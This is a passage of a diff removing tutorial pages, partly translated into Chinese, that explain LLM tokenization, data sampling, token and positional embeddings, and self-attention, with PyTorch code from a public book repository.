`"internationalization"` 可能被 tokenized 为更小的、有意义的子词,如 `["international", "ization"]`。
|
||||
|
||||
## Code Example
|
||||
|
||||
让我们通过来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb) 的代码示例更好地理解这一点:
|
||||
```python
|
||||
# Download a text to pre-train the model
|
||||
import urllib.request
|
||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
|
||||
file_path = "the-verdict.txt"
|
||||
urllib.request.urlretrieve(url, file_path)
|
||||
|
||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
|
||||
raw_text = f.read()
|
||||
|
||||
# Tokenize the code using GPT2 tokenizer version
|
||||
import tiktoken
|
||||
token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"}) # Allow the user of the tag "[EOS]"
|
||||
|
||||
# Print first 50 tokens
|
||||
print(token_ids[:50])
|
||||
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
|
||||
```
|
||||
## 参考文献
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
@ -1,240 +0,0 @@
|
||||
# 2. Data Sampling
|
||||
|
||||
## **Data Sampling**
|
||||
|
||||
**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.
|
||||
|
||||
> [!TIP]
|
||||
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
|
||||
|
||||
### **Why Data Sampling Matters**
|
||||
|
||||
LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.
|
||||
|
||||
### **Key Concepts in Data Sampling**
|
||||
|
||||
1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
|
||||
2. **Sequence Length (max_length):** The number of tokens in each input sequence.
|
||||
3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
|
||||
4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.
|
||||
|
||||
### **Step-by-Step Example**
|
||||
|
||||
Let's walk through an example to illustrate data sampling.
|
||||
|
||||
**Example Text**
|
||||
|
||||
```arduino
|
||||
"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
|
||||
```
|
||||
|
||||
**Tokenization**
|
||||
|
||||
Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:
|
||||
|
||||
```vbnet
|
||||
Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
|
||||
```
|
||||
|
||||
**Parameters**
|
||||
|
||||
- **Max Sequence Length (max_length):** 4 tokens
|
||||
- **Sliding Window Stride:** 1 token
|
||||
|
||||
**Creating Input and Target Sequences**
|
||||
|
||||
1. **Sliding Window Approach:**
|
||||
- **Input Sequences:** Each input sequence consists of `max_length` tokens.
|
||||
- **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
|
||||
2. **Generating Sequences:**
|
||||
|
||||
<table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>
|
||||
|
||||
3. **Resulting Input and Target Arrays:**
|
||||
|
||||
- **Input:**
|
||||
|
||||
```python
|
||||
[
|
||||
["Lorem", "ipsum", "dolor", "sit"],
|
||||
["ipsum", "dolor", "sit", "amet,"],
|
||||
["dolor", "sit", "amet,", "consectetur"],
|
||||
["sit", "amet,", "consectetur", "adipiscing"],
|
||||
]
|
||||
```
|
||||
|
||||
- **Target:**
|
||||
|
||||
```python
|
||||
[
|
||||
["ipsum", "dolor", "sit", "amet,"],
|
||||
["dolor", "sit", "amet,", "consectetur"],
|
||||
["sit", "amet,", "consectetur", "adipiscing"],
|
||||
["amet,", "consectetur", "adipiscing", "elit."],
|
||||
]
|
||||
```
|
||||
|
||||
**Visual Representation**
|
||||
|
||||
<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>
|
||||
|
||||
**Sliding Window with Stride 1:**
|
||||
|
||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
|
||||
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
|
||||
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
|
||||
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]
|
||||
|
||||
**Understanding Stride**
|
||||
|
||||
- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
|
||||
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
|
||||
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.
|
||||
|
||||
**Example with Stride of 2:**
|
||||
|
||||
Using the same tokenized text and `max_length` of 4:
|
||||
|
||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
|
||||
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
|
||||
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_
|
||||
|
||||
## Code Example
|
||||
|
||||
Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
||||
|
||||
```python
|
||||
# Download the text to pre-train the LLM
|
||||
import urllib.request
|
||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
|
||||
file_path = "the-verdict.txt"
|
||||
urllib.request.urlretrieve(url, file_path)
|
||||
|
||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
|
||||
raw_text = f.read()
|
||||
|
||||
"""
|
||||
Create a class that will receive some params lie tokenizer and text
|
||||
and will prepare the input chunks and the target chunks to prepare
|
||||
the LLM to learn which next token to generate
|
||||
"""
|
||||
import torch
|
||||
from torch.utils.data import Dataset, DataLoader
|
||||
|
||||
class GPTDatasetV1(Dataset):
|
||||
def __init__(self, txt, tokenizer, max_length, stride):
|
||||
self.input_ids = []
|
||||
self.target_ids = []
|
||||
|
||||
# Tokenize the entire text
|
||||
token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
|
||||
|
||||
# Use a sliding window to chunk the book into overlapping sequences of max_length
|
||||
for i in range(0, len(token_ids) - max_length, stride):
|
||||
input_chunk = token_ids[i:i + max_length]
|
||||
target_chunk = token_ids[i + 1: i + max_length + 1]
|
||||
self.input_ids.append(torch.tensor(input_chunk))
|
||||
self.target_ids.append(torch.tensor(target_chunk))
|
||||
|
||||
def __len__(self):
|
||||
return len(self.input_ids)
|
||||
|
||||
def __getitem__(self, idx):
|
||||
return self.input_ids[idx], self.target_ids[idx]
|
||||
|
||||
|
||||
"""
|
||||
Create a data loader which given the text and some params will
|
||||
prepare the inputs and targets with the previous class and
|
||||
then create a torch DataLoader with the info
|
||||
"""
|
||||
|
||||
import tiktoken
|
||||
|
||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
|
||||
stride=128, shuffle=True, drop_last=True,
|
||||
num_workers=0):
|
||||
|
||||
# Initialize the tokenizer
|
||||
tokenizer = tiktoken.get_encoding("gpt2")
|
||||
|
||||
# Create dataset
|
||||
dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
|
||||
|
||||
# Create dataloader
|
||||
dataloader = DataLoader(
|
||||
dataset,
|
||||
batch_size=batch_size,
|
||||
shuffle=shuffle,
|
||||
drop_last=drop_last,
|
||||
num_workers=num_workers
|
||||
)
|
||||
|
||||
return dataloader
|
||||
|
||||
|
||||
"""
|
||||
Finally, create the data loader with the params we want:
|
||||
- The used text for training
|
||||
- batch_size: The size of each batch
|
||||
- max_length: The size of each entry on each batch
|
||||
- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting, usually this is equals to the max_length so the same tokens aren't repeated.
|
||||
- shuffle: Re-order randomly
|
||||
"""
|
||||
dataloader = create_dataloader_v1(
|
||||
raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
|
||||
)
|
||||
|
||||
data_iter = iter(dataloader)
|
||||
first_batch = next(data_iter)
|
||||
print(first_batch)
|
||||
|
||||
# Note the batch_size of 8, the max_length of 4 and the stride of 1
|
||||
[
|
||||
# Input
|
||||
tensor([[ 40, 367, 2885, 1464],
|
||||
[ 367, 2885, 1464, 1807],
|
||||
[ 2885, 1464, 1807, 3619],
|
||||
[ 1464, 1807, 3619, 402],
|
||||
[ 1807, 3619, 402, 271],
|
||||
[ 3619, 402, 271, 10899],
|
||||
[ 402, 271, 10899, 2138],
|
||||
[ 271, 10899, 2138, 257]]),
|
||||
# Target
|
||||
tensor([[ 367, 2885, 1464, 1807],
|
||||
[ 2885, 1464, 1807, 3619],
|
||||
[ 1464, 1807, 3619, 402],
|
||||
[ 1807, 3619, 402, 271],
|
||||
[ 3619, 402, 271, 10899],
|
||||
[ 402, 271, 10899, 2138],
|
||||
[ 271, 10899, 2138, 257],
|
||||
[10899, 2138, 257, 7026]])
|
||||
]
|
||||
|
||||
# With stride=4 this will be the result:
|
||||
[
|
||||
# Input
|
||||
tensor([[ 40, 367, 2885, 1464],
|
||||
[ 1807, 3619, 402, 271],
|
||||
[10899, 2138, 257, 7026],
|
||||
[15632, 438, 2016, 257],
|
||||
[ 922, 5891, 1576, 438],
|
||||
[ 568, 340, 373, 645],
|
||||
[ 1049, 5975, 284, 502],
|
||||
[ 284, 3285, 326, 11]]),
|
||||
# Target
|
||||
tensor([[ 367, 2885, 1464, 1807],
|
||||
[ 3619, 402, 271, 10899],
|
||||
[ 2138, 257, 7026, 15632],
|
||||
[ 438, 2016, 257, 922],
|
||||
[ 5891, 1576, 438, 568],
|
||||
[ 340, 373, 645, 1049],
|
||||
[ 5975, 284, 502, 284],
|
||||
[ 3285, 326, 11, 287]])
|
||||
]
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
|
||||
@ -1,203 +0,0 @@
|
||||
# 3. Token Embeddings
|
||||
|
||||
## Token Embeddings
|
||||
|
||||
在对文本数据进行分词后,为像 GPT 这样的训练大型语言模型(LLMs)准备数据的下一个关键步骤是创建 **token embeddings**。Token embeddings 将离散的标记(如单词或子词)转换为模型可以处理和学习的连续数值向量。此解释分解了 token embeddings、它们的初始化、使用以及位置嵌入在增强模型对标记序列理解中的作用。
|
||||
|
||||
> [!TIP]
|
||||
> 这个第三阶段的目标非常简单:**为词汇表中每个先前的标记分配一个所需维度的向量以训练模型。** 词汇表中的每个单词将在 X 维空间中有一个点。\
|
||||
> 请注意,最初每个单词在空间中的位置只是“随机”初始化,这些位置是可训练的参数(将在训练过程中改进)。
|
||||
>
|
||||
> 此外,在 token embedding 过程中 **创建了另一层嵌入**,它表示(在这种情况下)**单词在训练句子中的绝对位置**。这样,句子中不同位置的单词将具有不同的表示(含义)。
|
||||
|
||||
### **What Are Token Embeddings?**
|
||||
|
||||
**Token Embeddings** 是在连续向量空间中对标记的数值表示。词汇表中的每个标记都与一个固定维度的唯一向量相关联。这些向量捕捉了关于标记的语义和句法信息,使模型能够理解数据中的关系和模式。
|
||||
|
||||
- **Vocabulary Size:** 模型词汇表中唯一标记的总数(例如,单词、子词)。
|
||||
- **Embedding Dimensions:** 每个标记向量中的数值(维度)数量。更高的维度可以捕捉更细微的信息,但需要更多的计算资源。
|
||||
|
||||
**Example:**
|
||||
|
||||
- **Vocabulary Size:** 6 tokens \[1, 2, 3, 4, 5, 6]
|
||||
- **Embedding Dimensions:** 3 (x, y, z)
|
||||
|
||||
### **Initializing Token Embeddings**
|
||||
|
||||
在训练开始时,token embeddings 通常用小的随机值初始化。这些初始值在训练过程中进行调整(微调),以更好地表示标记的含义,基于训练数据。
|
||||
|
||||
**PyTorch Example:**
|
||||
```python
|
||||
import torch
|
||||
|
||||
# Set a random seed for reproducibility
|
||||
torch.manual_seed(123)
|
||||
|
||||
# Create an embedding layer with 6 tokens and 3 dimensions
|
||||
embedding_layer = torch.nn.Embedding(6, 3)
|
||||
|
||||
# Display the initial weights (embeddings)
|
||||
print(embedding_layer.weight)
|
||||
```
|
||||
**输出:**
|
||||
```lua
|
||||
luaCopy codeParameter containing:
|
||||
tensor([[ 0.3374, -0.1778, -0.1690],
|
||||
[ 0.9178, 1.5810, 1.3010],
|
||||
[ 1.2753, -0.2010, -0.1606],
|
||||
[-0.4015, 0.9666, -1.1481],
|
||||
[-1.1589, 0.3255, -0.6315],
|
||||
[-2.8400, -0.7849, -1.4096]], requires_grad=True)
|
||||
```
|
||||
**解释:**
|
||||
|
||||
- 每一行对应词汇表中的一个标记。
|
||||
- 每一列表示嵌入向量中的一个维度。
|
||||
- 例如,索引为 `3` 的标记具有嵌入向量 `[-0.4015, 0.9666, -1.1481]`。
|
||||
|
||||
**访问标记的嵌入:**
|
||||
```python
|
||||
# Retrieve the embedding for the token at index 3
|
||||
token_index = torch.tensor([3])
|
||||
print(embedding_layer(token_index))
|
||||
```
|
||||
**输出:**
|
||||
```lua
|
||||
tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
|
||||
```
|
||||
**解释:**
|
||||
|
||||
- 索引为 `3` 的标记由向量 `[-0.4015, 0.9666, -1.1481]` 表示。
|
||||
- 这些值是可训练的参数,模型将在训练过程中调整这些参数,以更好地表示标记的上下文和含义。
|
||||
|
||||
### **标记嵌入在训练中的工作原理**
|
||||
|
||||
在训练过程中,输入数据中的每个标记都被转换为其对应的嵌入向量。这些向量随后在模型内的各种计算中使用,例如注意力机制和神经网络层。
|
||||
|
||||
**示例场景:**
|
||||
|
||||
- **批量大小:** 8(同时处理的样本数量)
|
||||
- **最大序列长度:** 4(每个样本的标记数量)
|
||||
- **嵌入维度:** 256
|
||||
|
||||
**数据结构:**
|
||||
|
||||
- 每个批次表示为形状为 `(batch_size, max_length, embedding_dim)` 的 3D 张量。
|
||||
- 对于我们的示例,形状将是 `(8, 4, 256)`。
|
||||
|
||||
**可视化:**
|
||||
```css
|
||||
cssCopy codeBatch
|
||||
┌─────────────┐
|
||||
│ Sample 1 │
|
||||
│ ┌─────┐ │
|
||||
│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
|
||||
│ │ 1 │ │
|
||||
│ │... │ │
|
||||
│ │Token│ │
|
||||
│ │ 4 │ │
|
||||
│ └─────┘ │
|
||||
│ Sample 2 │
|
||||
│ ┌─────┐ │
|
||||
│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
|
||||
│ │ 1 │ │
|
||||
│ │... │ │
|
||||
│ │Token│ │
|
||||
│ │ 4 │ │
|
||||
│ └─────┘ │
|
||||
│ ... │
|
||||
│ Sample 8 │
|
||||
│ ┌─────┐ │
|
||||
│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
|
||||
│ │ 1 │ │
|
||||
│ │... │ │
|
||||
│ │Token│ │
|
||||
│ │ 4 │ │
|
||||
│ └─────┘ │
|
||||
└─────────────┘
|
||||
```
|
||||
**解释:**
|
||||
|
||||
- 序列中的每个令牌由一个256维的向量表示。
|
||||
- 模型处理这些嵌入以学习语言模式并生成预测。
|
||||
|
||||
## **位置嵌入:为令牌嵌入添加上下文**
|
||||
|
||||
虽然令牌嵌入捕捉了单个令牌的含义,但它们并不固有地编码令牌在序列中的位置。理解令牌的顺序对于语言理解至关重要。这就是**位置嵌入**发挥作用的地方。
|
||||
|
||||
### **为什么需要位置嵌入:**
|
||||
|
||||
- **令牌顺序很重要:** 在句子中,意义往往依赖于单词的顺序。例如,“猫坐在垫子上”与“垫子坐在猫上”。
|
||||
- **嵌入限制:** 如果没有位置信息,模型将令牌视为“词袋”,忽略它们的顺序。
|
||||
|
||||
### **位置嵌入的类型:**
|
||||
|
||||
1. **绝对位置嵌入:**
|
||||
- 为序列中的每个位置分配一个唯一的位置向量。
|
||||
- **示例:** 任何序列中的第一个令牌具有相同的位置嵌入,第二个令牌具有另一个,以此类推。
|
||||
- **使用者:** OpenAI的GPT模型。
|
||||
2. **相对位置嵌入:**
|
||||
- 编码令牌之间的相对距离,而不是它们的绝对位置。
|
||||
- **示例:** 指示两个令牌之间的距离,无论它们在序列中的绝对位置如何。
|
||||
- **使用者:** 像Transformer-XL和一些BERT变体的模型。
|
||||
|
||||
### **位置嵌入是如何集成的:**
|
||||
|
||||
- **相同维度:** 位置嵌入与令牌嵌入具有相同的维度。
|
||||
- **相加:** 它们被添加到令牌嵌入中,将令牌身份与位置信息结合,而不增加整体维度。
|
||||
|
||||
**添加位置嵌入的示例:**
|
||||
|
||||
假设一个令牌嵌入向量是`[0.5, -0.2, 0.1]`,其位置嵌入向量是`[0.1, 0.3, -0.1]`。模型使用的组合嵌入将是:
|
||||
```css
|
||||
Combined Embedding = Token Embedding + Positional Embedding
|
||||
= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
|
||||
= [0.6, 0.1, 0.0]
|
||||
```
|
||||
**位置嵌入的好处:**
|
||||
|
||||
- **上下文意识:** 模型可以根据位置区分标记。
|
||||
- **序列理解:** 使模型能够理解语法、句法和上下文相关的含义。
|
||||
|
||||
## 代码示例
|
||||
|
||||
以下是来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb) 的代码示例:
|
||||
```python
|
||||
# Use previous code...
|
||||
|
||||
# Create dimensional emdeddings
|
||||
"""
|
||||
BPE uses a vocabulary of 50257 words
|
||||
Let's supose we want to use 256 dimensions (instead of the millions used by LLMs)
|
||||
"""
|
||||
|
||||
vocab_size = 50257
|
||||
output_dim = 256
|
||||
token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
|
||||
|
||||
## Generate the dataloader like before
|
||||
max_length = 4
|
||||
dataloader = create_dataloader_v1(
|
||||
raw_text, batch_size=8, max_length=max_length,
|
||||
stride=max_length, shuffle=False
|
||||
)
|
||||
data_iter = iter(dataloader)
|
||||
inputs, targets = next(data_iter)
|
||||
|
||||
# Apply embeddings
|
||||
token_embeddings = token_embedding_layer(inputs)
|
||||
print(token_embeddings.shape)
|
||||
torch.Size([8, 4, 256]) # 8 x 4 x 256
|
||||
|
||||
# Generate absolute embeddings
|
||||
context_length = max_length
|
||||
pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)
|
||||
|
||||
pos_embeddings = pos_embedding_layer(torch.arange(max_length))
|
||||
|
||||
input_embeddings = token_embeddings + pos_embeddings
|
||||
print(input_embeddings.shape) # torch.Size([8, 4, 256])
|
||||
```
|
||||
## 参考文献
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
@ -1,416 +0,0 @@
|
||||
# 4. 注意机制
|
||||
|
||||
## 神经网络中的注意机制和自注意力
|
||||
|
||||
注意机制允许神经网络在生成输出的每个部分时**专注于输入的特定部分**。它们为不同的输入分配不同的权重,帮助模型决定哪些输入与当前任务最相关。这在机器翻译等任务中至关重要,因为理解整个句子的上下文对于准确翻译是必要的。
|
||||
|
||||
> [!TIP]
|
||||
> 这一阶段的目标非常简单:**应用一些注意机制**。这些将是许多**重复的层**,将**捕捉词汇中一个词与当前用于训练LLM的句子中其邻居的关系**。\
|
||||
> 为此使用了很多层,因此将有很多可训练的参数来捕捉这些信息。
|
||||
|
||||
### 理解注意机制
|
||||
|
||||
在传统的序列到序列模型中,模型将输入序列编码为固定大小的上下文向量。然而,这种方法在处理长句子时会遇到困难,因为固定大小的上下文向量可能无法捕捉所有必要的信息。注意机制通过允许模型在生成每个输出标记时考虑所有输入标记来解决这一限制。
|
||||
|
||||
#### 示例:机器翻译
|
||||
|
||||
考虑将德语句子 "Kannst du mir helfen diesen Satz zu übersetzen" 翻译成英语。逐字翻译不会产生语法正确的英语句子,因为不同语言之间的语法结构存在差异。注意机制使模型在生成输出句子的每个单词时能够专注于输入句子的相关部分,从而导致更准确和连贯的翻译。
|
||||
|
||||
### 自注意力介绍
|
||||
|
||||
自注意力或内部注意力是一种机制,其中注意力在单个序列内应用,以计算该序列的表示。它允许序列中的每个标记关注所有其他标记,帮助模型捕捉标记之间的依赖关系,而不管它们在序列中的距离。
|
||||
|
||||
#### 关键概念
|
||||
|
||||
- **标记**:输入序列的单个元素(例如,句子中的单词)。
|
||||
- **嵌入**:标记的向量表示,捕捉语义信息。
|
||||
- **注意权重**:确定每个标记相对于其他标记重要性的值。
|
||||
|
||||
### 计算注意权重:逐步示例
|
||||
|
||||
让我们考虑句子 **"Hello shiny sun!"** 并用3维嵌入表示每个单词:
|
||||
|
||||
- **Hello**: `[0.34, 0.22, 0.54]`
|
||||
- **shiny**: `[0.53, 0.34, 0.98]`
|
||||
- **sun**: `[0.29, 0.54, 0.93]`
|
||||
|
||||
我们的目标是使用自注意力计算**"shiny"**的**上下文向量**。
|
||||
|
||||
#### 步骤1:计算注意分数
|
||||
|
||||
> [!TIP]
|
||||
> 只需将查询的每个维度值与每个标记的相关维度相乘并加上结果。你将为每对标记获得1个值。
|
||||
|
||||
对于句子中的每个单词,通过计算它们嵌入的点积来计算与 "shiny" 的**注意分数**。
|
||||
|
||||
**"Hello" 和 "shiny" 之间的注意分数**
|
||||
|
||||
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||
|
||||
**"shiny" 和 "shiny" 之间的注意分数**
|
||||
|
||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||
|
||||
**"sun" 和 "shiny" 之间的注意分数**
|
||||
|
||||
<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||
|
||||
#### 步骤2:归一化注意分数以获得注意权重
|
||||
|
||||
> [!TIP]
|
||||
> 不要迷失在数学术语中,这个函数的目标很简单,归一化所有权重,使**它们的总和为1**。
|
||||
>
|
||||
> 此外,**softmax** 函数被使用,因为它通过指数部分强调差异,使得更容易检测有用的值。
|
||||
|
||||
应用**softmax函数**将注意分数转换为总和为1的注意权重。
|
||||
|
||||
<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
|
||||
|
||||
计算指数:
|
||||
|
||||
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
|
||||
|
||||
计算总和:
|
||||
|
||||
<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||
|
||||
计算注意权重:
|
||||
|
||||
<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
|
||||
|
||||
#### 步骤3:计算上下文向量
|
||||
|
||||
> [!TIP]
|
||||
> 只需获取每个注意权重并将其乘以相关标记的维度,然后将所有维度相加以获得一个向量(上下文向量)
|
||||
|
||||
**上下文向量**是通过使用注意权重对所有单词的嵌入进行加权求和计算得出的。
|
||||
|
||||
<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
|
||||
|
||||
计算每个分量:
|
||||
|
||||
- **"Hello" 的加权嵌入**:
|
||||
|
||||
<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
- **"shiny" 的加权嵌入**:
|
||||
|
||||
<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
- **"sun" 的加权嵌入**:
|
||||
|
||||
<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
加权嵌入的总和:
|
||||
|
||||
`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
|
||||
|
||||
**这个上下文向量表示了“shiny”的丰富嵌入,结合了句子中所有单词的信息。**
|
||||
|
||||
### 过程总结
|
||||
|
||||
1. **计算注意分数**:使用目标单词的嵌入与序列中所有单词的嵌入之间的点积。
|
||||
2. **归一化分数以获得注意权重**:对注意分数应用softmax函数以获得总和为1的权重。
|
||||
3. **计算上下文向量**:将每个单词的嵌入乘以其注意权重并求和结果。
|
||||
|
||||
## 带可训练权重的自注意力
|
||||
|
||||
在实践中,自注意力机制使用**可训练权重**来学习查询、键和值的最佳表示。这涉及引入三个权重矩阵:
|
||||
|
||||
<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
|
||||
|
||||
查询是像以前一样使用的数据,而键和值矩阵只是随机可训练的矩阵。
|
||||
|
||||
#### 步骤1:计算查询、键和值
|
||||
|
||||
每个标记将通过将其维度值与定义的矩阵相乘来拥有自己的查询、键和值矩阵:
|
||||
|
||||
<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
|
||||
|
||||
这些矩阵将原始嵌入转换为适合计算注意力的新空间。
|
||||
|
||||
**示例**
|
||||
|
||||
假设:
|
||||
|
||||
- 输入维度 `din=3`(嵌入大小)
|
||||
- 输出维度 `dout=2`(查询、键和值的期望维度)
|
||||
|
||||
初始化权重矩阵:
|
||||
```python
|
||||
import torch.nn as nn
|
||||
|
||||
d_in = 3
|
||||
d_out = 2
|
||||
|
||||
W_query = nn.Parameter(torch.rand(d_in, d_out))
|
||||
W_key = nn.Parameter(torch.rand(d_in, d_out))
|
||||
W_value = nn.Parameter(torch.rand(d_in, d_out))
|
||||
```
|
||||
计算查询、键和值:
|
||||
```python
|
||||
queries = torch.matmul(inputs, W_query)
|
||||
keys = torch.matmul(inputs, W_key)
|
||||
values = torch.matmul(inputs, W_value)
|
||||
```
|
||||
#### 第2步:计算缩放点积注意力
|
||||
|
||||
**计算注意力分数**
|
||||
|
||||
与之前的示例类似,但这次我们使用的是令牌的键矩阵(已经使用维度计算得出),而不是令牌的维度值。因此,对于每个查询 `qi` 和键 `kj`:
|
||||
|
||||
<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**缩放分数**
|
||||
|
||||
为了防止点积变得过大,通过键维度 `dk` 的平方根来缩放它们:
|
||||
|
||||
<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
|
||||
|
||||
> [!TIP]
|
||||
> 分数除以维度的平方根是因为点积可能变得非常大,这有助于调节它们。
|
||||
|
||||
**应用Softmax以获得注意力权重:** 如最初示例中所示,规范化所有值,使它们的总和为1。
|
||||
|
||||
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
|
||||
|
||||
#### 第3步:计算上下文向量
|
||||
|
||||
与最初的示例一样,只需将所有值矩阵相加,每个值乘以其注意力权重:
|
||||
|
||||
<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
|
||||
|
||||
### 代码示例
|
||||
|
||||
从 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) 获取一个示例,您可以查看这个实现我们所讨论的自注意力功能的类:
|
||||
```python
|
||||
import torch
|
||||
|
||||
inputs = torch.tensor(
|
||||
[[0.43, 0.15, 0.89], # Your (x^1)
|
||||
[0.55, 0.87, 0.66], # journey (x^2)
|
||||
